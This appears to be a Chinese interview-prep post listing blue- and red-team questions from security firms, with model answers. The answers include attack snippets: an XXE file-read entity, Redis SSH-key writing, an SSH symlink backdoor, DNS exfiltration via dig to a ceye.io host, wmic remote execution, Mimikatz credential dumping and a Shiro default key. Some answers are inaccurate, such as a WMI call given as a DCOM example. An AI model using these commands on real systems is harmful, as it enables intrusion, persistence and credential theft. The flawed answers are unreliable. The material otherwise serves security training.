网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
各厂商二面试题01
一、青藤(蓝队)
1. 自我介绍
2. 设备误报处理(日志)
3. 扫描流量与手动流量的区分
4. 被拿Shell的应急响应
5. 代理数据流分析
二、360(蓝队)
1. 溯源与态势感知
2. 基础漏洞原理
三、漏洞盒子
1. 印象最深的渗透经历
2. 漏洞平台提交与排名
3. 挖洞与渗透测试
四、未知厂商
1. 中间件漏洞
2. 权限维持手段
3. 隧道与代理
五、长亭-红队(红队)
1. 打点漏洞
2. Shiro漏洞检测
3. Shiro漏洞类型
4. 不出网场景利用
5. 横向渗透与密码抓取
6. 会话劫持
各厂商二面试题01
一、青藤 蓝队1、自我介绍2、设备误报如何处理(日志)3、如何查看区分是扫描流量和手动流量(扫描数据量大,请求有规律,手动扫描间隔较少)4、被拿shell了如何处理(排查、清除、关站、看看可有即使修复的可能,没有可能就关站)5、如何分析被代理出来的数据流二、360 蓝队1、溯源 态势感知 安全设备2、基础的漏洞原理 ssrf xxe Redis几种利用方式三、漏洞盒子 1、印象最深的渗透经历,技术关键点2、是否在漏洞平台有提交过漏洞,以及排名情况3、平时挖洞的情况,平台提交漏洞和渗透测试方面四、未知厂商 1、讲一下使过的中间件漏洞2、getshell后如何维持权限3、隧道、流量代理方面五、长亭-红队 红队(内容稍多)问:打点一般会用什么漏洞问:平常怎么去发现shiro漏洞的问:shiro有几种漏洞类型问:weblogic权限绕过有没有了解问:fastjson漏洞利用原理问:weblogic有几种漏洞问:IIOP听说过吗,和什么类似问:这几个漏洞不出网情况下怎么办问:拿到webshell不出网情况下怎么办问:dns出网协议怎么利用问:横向渗透命令执行手段问:psexec和wmic或者其他的区别问:Dcom怎么操作?问:抓取密码的话会怎么抓问:什么版本之后抓不到密码问:抓不到的话怎么办问:域内攻击方法有了解过吗问:桌面有管理员会话,想要做会话劫持怎么做
一、青藤(蓝队)
1. 自我介绍
需结合个人经验,突出以下要素:
- 攻防演练经历(如护网行动中的角色、成果);
- 安全设备运维经验(如EDR、WAF、蜜罐的部署与分析);
- 威胁分析能力(如日志分析、流量溯源)。
2. 设备误报处理(日志)
- 验证误报:对比原始日志与设备告警,检查请求参数、响应状态码是否合理;
- 分类处理:通过白名单(如业务IP、合法扫描工具)或调整检测规则阈值;
- 自动化优化:结合SIEM系统标记低风险事件,减少人工干预。
3. 扫描流量与手动流量的区分
- 扫描流量特征:
- 高频请求(如每秒数十次同路径访问);
- 固定User-Agent(如sqlmap、Nmap标识);
- 覆盖全端口/IP段(如顺序扫描1-65535端口)。
- 手动流量特征:
- 请求间隔随机(人工操作延迟);
- 参数尝试性变化(如手工测试SQL注入的
'
、1=1
);- 关联登录态(如携带Cookie的敏感操作)。
4. 被拿Shell的应急响应
- 隔离阶段:
- 立即断开服务器网络或关闭非核心服务;
- 保留现场(内存转储、进程快照)。
- 排查阶段:
- 查Web日志定位入侵路径(如上传漏洞、反序列化入口);
- 检查计划任务、启动项、隐藏进程(如Linux cron、Windows注册表);
- 比对Webshell哈希与正常文件。
- 修复阶段:
- 修补漏洞(如框架升级、配置加固);
- 部署HIDS监控异常行为(如命令执行、敏感目录访问)。
5. 代理数据流分析
- 流量特征提取:
- 协议识别(如HTTP代理流量中的
CONNECT
方法);- 载荷分析(如Base64编码的隧道数据);
- 行为关联:
- 追踪源IP与目标IP的会话持续性;
- 检测异常DNS请求(如DNS隧道中的长域名查询)。
二、360(蓝队)
1. 溯源与态势感知
- 溯源方法:
- 结合威胁情报(如IP信誉库、恶意域名库);
- 关联多设备日志(如防火墙拦截记录 + EDR进程树分析)。
- 态势感知设备联动:
- 通过NDR(网络检测与响应)实时分析流量;
- 与SOAR平台集成自动化封禁恶意IP。
2. 基础漏洞原理
- SSRF:利用服务端发起内部请求(如读取
file:///etc/passwd
或攻击Redis);- XXE:解析外部实体导致文件读取/SSRF(如
<!ENTITY xxe SYSTEM "file:///etc/passwd">
);- Redis利用:
- 未授权写SSH密钥(
config set dir /root/.ssh
);- 主从复制RCE(通过
SLAVEOF
加载恶意模块)。
三、漏洞盒子
1. 印象最深的渗透经历
案例:某金融系统通过链式漏洞突破边界:
- 信息泄露:Git源码暴露数据库配置;
- 垂直越权:修改Cookie中的
userid
参数访问管理员接口;- RCE:利用Fastjson反序列化注入内存马。
技术关键点:绕过WAF规则(如分块传输编码、注释符混淆)。2. 漏洞平台提交与排名
- 示例回答:在EDUSRC/CNVD提交过20+漏洞,曾获某季度TOP 10;
- 强调漏洞类型多样性(如逻辑漏洞占比40%,配置错误占比30%)。
3. 挖洞与渗透测试
- 平台提交:侧重自动化工具+人工验证(如AWVS扫描后手工挖掘业务逻辑漏洞);
- 渗透测试:红队协作模式(如内网横向渗透时结合BloodHound分析域环境)。
四、未知厂商
1. 中间件漏洞
- Apache:解析漏洞(
.php.xxx
被当作PHP执行);- Nginx:错误配置导致目录穿越(
/files../
);- Tomcat:CVE-2017-12615(PUT上传漏洞)。
2. 权限维持手段
- 后门类型:
- Web层:隐藏Webshell(如
.index.php.swp
);- 系统层:SSH软链接后门(
ln -sf /usr/sbin/sshd /tmp/su
);- 计划任务:Linux cron或Windows任务计划程序加载恶意脚本。
3. 隧道与代理
- 工具选择:
- HTTP隧道:reGeorg/proxychains;
- ICMP/DNS隧道:icmpsh/dnscat2;
- 隐蔽性优化:流量加密(如AES) + 模拟合法协议(如伪装成Cloudflare流量)。
五、长亭-红队(红队)
1. 打点漏洞
- 高频漏洞:
- Web框架漏洞(如Shiro反序列化、Fastjson RCE);
- 中间件漏洞(Weblogic T3协议反序列化);
- 未授权访问(如Redis、Hadoop YARN)。
2. Shiro漏洞检测
- 识别特征:Cookie中的
rememberMe
字段;- 利用方式:
- 密钥硬编码(如默认密钥
kPH+bIxk5D2deZiIxcaaaA==
);- 反序列化Gadget(如CommonsBeanutils链)。
3. Shiro漏洞类型
- 反序列化漏洞(CVE-2016-4437);
- 权限绕过(CVE-2020-1957);
- 密钥硬编码(默认密钥未修改)。
4. 不出网场景利用
- 协议复用:
- 利用SMB协议进行内网穿透(如Procmon监控445端口);
- DNS Log外带数据(如通过
dig xxx.ceye.io
回传结果)。- 工具适配:
- 不出网Webshell使用内存马(如Java Agent注入);
- 通过ICMP隧道执行命令(如PingTunnel)。
5. 横向渗透与密码抓取
- 横向命令执行:
- WMI执行远程命令(
wmic /node:192.168.1.2 process call create "cmd.exe"
);- DCOM通过MMC20.Application组件调用(
GetObject("winmgmts:\\\\192.168.1.2\\...")
)。- 密码抓取与绕过:
- 工具:Mimikatz(
sekurlsa::logonpasswords
);- Windows 2012后需绕过LSA保护(如加载驱动
mimidrv.sys
);- 无明文密码时使用PTH(Pass-the-Hash)或Kerberos票证攻击。
6. 会话劫持
- 工具与方法:
- 使用Mimikatz的
ts::sessions
查看会话ID;- 通过RDP劫持(如Shadow Attack)接管已登录的会话;
- 注入DLL到explorer.exe 进程获取用户令牌。